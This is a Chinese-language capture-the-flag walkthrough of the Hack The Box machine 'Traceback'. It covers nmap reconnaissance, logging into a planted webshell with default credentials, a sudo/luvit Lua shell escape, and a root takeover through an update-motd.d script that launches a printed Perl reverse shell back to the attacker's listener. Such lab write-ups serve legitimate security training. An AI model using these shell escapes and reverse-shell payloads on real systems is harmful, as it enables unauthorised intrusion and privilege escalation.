HackTheBox - TrackBack
搜集信息:
kali@kali:~$ nmap -v -A 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 04:49 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating Ping Scan at 04:49
Scanning 10.10.10.181 [2 ports]
Completed Ping Scan at 04:49, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:49
Completed Parallel DNS resolution of 1 host. at 04:49, 2.31s elapsed
Initiating Connect Scan at 04:49
Scanning 10.10.10.181 [1000 ports]
Discovered open port 80/tcp on 10.10.10.181
Discovered open port 22/tcp on 10.10.10.181
Completed Connect Scan at 04:49, 6.90s elapsed (1000 total ports)
Initiating Service scan at 04:49
Scanning 2 services on 10.10.10.181
Completed Service scan at 04:49, 6.35s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.181.
Initiating NSE at 04:49
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (1 waiting)
NSE Timing: About 99.27% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (2 waiting)
NSE Timing: About 99.27% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 2 (2 waiting)
NSE Timing: About 99.27% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.63% done; ETC: 04:49 (0:00:00 remaining)
Completed NSE at 04:49, 4.84s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.66s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Nmap scan report for 10.10.10.181
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.74 seconds
继续回到主页。右键查看源代码,作者提示留下了webshell后门。
通过社会工程学。发现了作者有个webshell 项目。果然试出来了。
账号:admin,密码:admin。成功登录
这木马挺强大的。能自动返回shell。此时获得webadmin权限。
登录后发现
$ whoami
webadmin
$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
$
可以以 sysadmin权限执行lua脚本。于是,我写了这样的脚本
echo "os.execute('/bin/sh')" > fuckme.lua
sudo -u sysadmin /home/sysadmin/luvit /home/webadmin/fuckme.lua
$ sudo -u sysadmin /home/sysadmin/luvit /home/webadmin/hack.lua
sh: turning off NDELAY mode
whoami
sysadmin
cd /home
ls a
ls: cannot access 'a': No such file or directory
ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 sysadmin
drwxr-x--- 5 webadmin sysadmin 4096 Apr 23 07:56 webadmin
cd sysadmin
ls -al
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Apr 23 07:44 user.txt
cat user.txt
24307597bac31dff3123ff294c2583d4
sysadmin@traceback:/tmp$ sesrevricvicee ---s-tsattuatuss--alall
l
[ + ] apache-htcacheclean
[ + ] apache2
[ + ] apparmor
[ - ] console-setup.sh
[ + ] cron
[ + ] dbus
[ + ] grub-common
[ - ] hwclock.sh
[ + ] irqbalance
[ - ] keyboard-setup.sh
[ + ] kmod
[ + ] open-vm-tools
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ - ] rsync
[ + ] rsyslog
[ + ] ssh
[ + ] udev
[ + ] ufw
[ - ] uuidd
[ - ] x11-common
sysadmin@traceback:/tmp$ uname -a
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
最终由于这句话,把重心放到了SSH服务上面
kali@kali:~$ ssh sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
root 7023 0.0 0.0 58792 3100 ? S 00:49 0:00 /usr/sbin/CRON -f
root 7025 0.0 0.0 4628 784 ? Ss 00:49 0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
/usr/bin/perl /tmp/1.pl 10.10.14.58 1234
#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);
sysadmin@traceback:/etc/update-motd.d$ ls
00-header 10-help-text 50-motd-news 80-esm 91-release-upgrade
sysadmin@traceback:/etc/update-motd.d$ nano 00-header
sysadmin@traceback:/etc/update-motd.d$ pwd
/etc/update-motd.d
[ -r /etc/lsb-release ] && . /etc/lsb-release
/usr/bin/perl /tmp/1.pl 10.10.14.58 1234
echo "\nWelcome to Xh4H land \n"
kali@kali:~$ sudo nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.58] from (UNKNOWN) [10.10.10.181] 37218
/bin/sh: 0: can't access tty; job control turned off
$ ^C
kali@kali:~$ sudo nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.58] from (UNKNOWN) [10.10.10.181] 37302
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root/
# ls
root.txt
# cat root.txt
ed41a5a0fe9b304a2450aeb362c12ead
#
kali@kali:~$ ssh -i ~/.ssh/id_rsa root@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jan 24 03:43:29 2020
root@traceback:~# whoami
root
root@traceback:~# ifconfig
ens33: flags=4163 mtu 1500
inet 10.10.10.181 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:a22b prefixlen 64 scopeid 0x0
inet6 fe80::250:56ff:feb9:a22b prefixlen 64 scopeid 0x20
ether 00:50:56:b9:a2:2b txqueuelen 1000 (Ethernet)
RX packets 22735 bytes 1912331 (1.9 MB)
RX errors 0 dropped 128 overruns 0 frame 0
TX packets 22021 bytes 4632098 (4.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 9811 bytes 776291 (776.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9811 bytes 776291 (776.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
评论
发表评论